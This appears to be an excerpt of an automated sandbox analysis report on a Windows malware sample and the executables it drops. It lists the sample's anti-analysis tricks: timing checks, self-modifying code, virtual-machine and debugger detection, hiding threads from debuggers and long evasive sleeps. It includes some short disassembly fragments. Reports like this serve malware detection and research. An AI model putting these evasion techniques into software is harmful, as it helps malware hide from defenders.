Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520C06 second address: 5520C54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99150F9506h 0x0000000f push eax 0x00000010 jmp 00007F99150F94FBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F99150F9505h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520C54 second address: 5520C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520C5A second address: 5520C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520C5E second address: 5520C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ebx, 48951078h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520C70 second address: 5520CEC instructions: 0x00000000 rdtsc 0x00000002 mov esi, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push dword ptr [ebp+0Ch] 0x0000000a jmp 00007F99150F9505h 0x0000000f push dword ptr [ebp+08h] 0x00000012 jmp 00007F99150F94FEh 0x00000017 push 326DA3A9h 0x0000001c pushad 0x0000001d mov edx, 5F440652h 0x00000022 pushfd 0x00000023 jmp 00007F99150F9503h 0x00000028 adc cx, 424Eh 0x0000002d jmp 00007F99150F9509h 0x00000032 popfd 0x00000033 popad 0x00000034 xor dword ptr [esp], 326CA3ABh 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov edx, ecx 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F43FF second address: 11F441A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F99146B45A1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F441A second address: 11F4420 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F4420 second address: 11F4426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D0500 second address: 54D0550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F99150F9504h 0x00000010 pushfd 0x00000011 jmp 00007F99150F9502h 0x00000016 and cx, B458h 0x0000001b jmp 00007F99150F94FBh 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D0550 second address: 54D05FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F99146B45A0h 0x00000009 pop eax 0x0000000a popad 0x0000000b call 00007F99146B459Bh 0x00000010 jmp 00007F99146B45A8h 0x00000015 pop esi 0x00000016 popad 0x00000017 push FFFFFFFEh 0x00000019 jmp 00007F99146B45A1h 0x0000001e push 0C5976F9h 0x00000023 jmp 00007F99146B45A7h 0x00000028 xor dword ptr [esp], 7AA1B6E1h 0x0000002f jmp 00007F99146B45A6h 0x00000034 push 7510BABBh 0x00000039 jmp 00007F99146B45A1h 0x0000003e xor dword ptr [esp], 03FF14BBh 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D05FA second address: 54D05FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D05FE second address: 54D0604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D0604 second address: 54D0624 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F9502h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f pushad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D0624 second address: 54D06B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F99146B45A8h 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F99146B45A0h 0x00000011 push eax 0x00000012 jmp 00007F99146B459Bh 0x00000017 nop 0x00000018 jmp 00007F99146B45A6h 0x0000001d sub esp, 1Ch 0x00000020 jmp 00007F99146B45A0h 0x00000025 xchg eax, ebx 0x00000026 jmp 00007F99146B45A0h 0x0000002b push eax 0x0000002c pushad 0x0000002d movsx edi, ax 0x00000030 jmp 00007F99146B459Ah 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov bl, 9Dh 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D06B1 second address: 54D06ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 push ebx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F99150F9504h 0x00000011 mov dword ptr [esp], esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F99150F9507h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D06ED second address: 54D06F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D06F3 second address: 54D070B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D070B second address: 54D075B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 5552264Ch 0x00000008 pushfd 0x00000009 jmp 00007F99146B45A5h 0x0000000e add cx, A326h 0x00000013 jmp 00007F99146B45A1h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d jmp 00007F99146B45A1h 0x00000022 xchg eax, edi 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D075B second address: 54D0763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, dx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D0763 second address: 54D0769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D0769 second address: 54D076D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D076D second address: 54D07F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [76FAB370h] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F99146B45A6h 0x00000014 jmp 00007F99146B45A5h 0x00000019 popfd 0x0000001a mov bx, ax 0x0000001d popad 0x0000001e xor dword ptr [ebp-08h], eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F99146B45A8h 0x00000028 sub cx, 6BE8h 0x0000002d jmp 00007F99146B459Bh 0x00000032 popfd 0x00000033 popad 0x00000034 xor eax, ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F99146B45A1h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D07F0 second address: 54D07F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D07F5 second address: 54D084D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F99146B459Dh 0x0000000a add esi, 506EA8B6h 0x00000010 jmp 00007F99146B45A1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 nop 0x0000001a jmp 00007F99146B459Eh 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 call 00007F99146B45A7h 0x00000028 pop eax 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D084D second address: 54D0865 instructions: 0x00000000 rdtsc 0x00000002 mov eax, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, 6E38h 0x0000000a popad 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F99150F94FAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D0865 second address: 54D086B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D086B second address: 54D086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D086F second address: 54D0873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D0873 second address: 54D0894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99150F9504h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D0894 second address: 54D089A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D089A second address: 54D089E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 103EB1E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 103EC10 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 11E5FE6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1211AE4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 11EFE62 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 12759C1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: A3EB1E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: A3EC10 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: BE5FE6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: C11AE4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: BEFE62 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: C759C1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Special instruction interceptor: First address: 90F970 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Special instruction interceptor: First address: AE3EA9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Special instruction interceptor: First address: 90F8AF instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05520BF8 rdtsc 0_2_05520BF8
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1575 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1362 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1474 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Window / User API: threadDelayed 543
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Window / User API: threadDelayed 522
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe API coverage: 0.0 %
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe API coverage: 3.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5264 Thread sleep count: 48 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5264 Thread sleep time: -96048s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5900 Thread sleep count: 46 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5900 Thread sleep time: -92046s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3924 Thread sleep count: 328 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3924 Thread sleep time: -9840000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2316 Thread sleep count: 53 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2316 Thread sleep time: -106053s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 764 Thread sleep count: 1575 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 764 Thread sleep time: -3151575s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1216 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2804 Thread sleep count: 1362 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2804 Thread sleep time: -2725362s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3276 Thread sleep count: 1474 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3276 Thread sleep time: -2949474s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0094DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 8_2_0094DBBE
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0091C2A2 FindFirstFileExW, 8_2_0091C2A2
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_009568EE FindFirstFileW,FindClose, 8_2_009568EE
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0095698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 8_2_0095698F
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0094D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_0094D076
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0094D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_0094D3A9
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00959642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00959642
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0095979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_0095979D
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 8_2_00959B2B
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00955C97 FindFirstFileW,FindNextFileW,FindClose, 8_2_00955C97
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 8_2_008E42DE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: 63371c25d6.exe, 63371c25d6.exe, 0000001D.00000002.3012103771.0000000000A9C000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 63371c25d6.exe, 00000007.00000002.2739218915.0000000001222000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: 63371c25d6.exe, 0000001D.00000002.3013597839.0000000000F55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW9U)
Source: axplong.exe, 00000006.00000002.3288889656.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2866418794.000002ADC12FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: 63371c25d6.exe, 00000007.00000002.2739218915.00000000011AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareVC:5
Source: file.exe, 00000000.00000003.2052929999.00000000016E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: axplong.exe, 00000006.00000003.3263828308.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 00000007.00000002.2739218915.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 00000007.00000002.2739218915.0000000001222000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2879623730.0000025929BBA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2879623730.0000025929BF1000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 00000018.00000002.2831755373.0000000001207000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2866384916.000001CBE779A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2869359238.000001CBE7F70000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 0000001D.00000002.3013597839.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3050235794.000001EF1F7A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 63371c25d6.exe, 0000001D.00000002.3013597839.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: firefox.exe, 00000015.00000002.2881592543.0000025933AC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2876411618.000002ADC1716000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 63371c25d6.exe, 00000018.00000002.2831755373.00000000011D9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: 63371c25d6.exe, 0000001D.00000002.3013597839.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: axplong.exe, 00000006.00000003.3263828308.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2877221775.000002ADC1800000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWk
Source: file.exe, 00000000.00000002.2078874880.00000000011C9000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2106984308.0000000000BC9000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2112645093.0000000000BC9000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.3282431990.0000000000BC9000.00000040.00000001.01000000.00000007.sdmp, 63371c25d6.exe, 00000007.00000002.2737809197.0000000000A9C000.00000040.00000001.01000000.00000009.sdmp, 63371c25d6.exe, 00000018.00000002.2829196663.0000000000A9C000.00000040.00000001.01000000.00000009.sdmp, 63371c25d6.exe, 0000001D.00000002.3012103771.0000000000A9C000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: firefox.exe, 00000015.00000002.2879623730.0000025929BB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: firefox.exe, 00000016.00000002.2877221775.000002ADC1800000.00000004.00000001.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2869359238.000001CBE7F70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
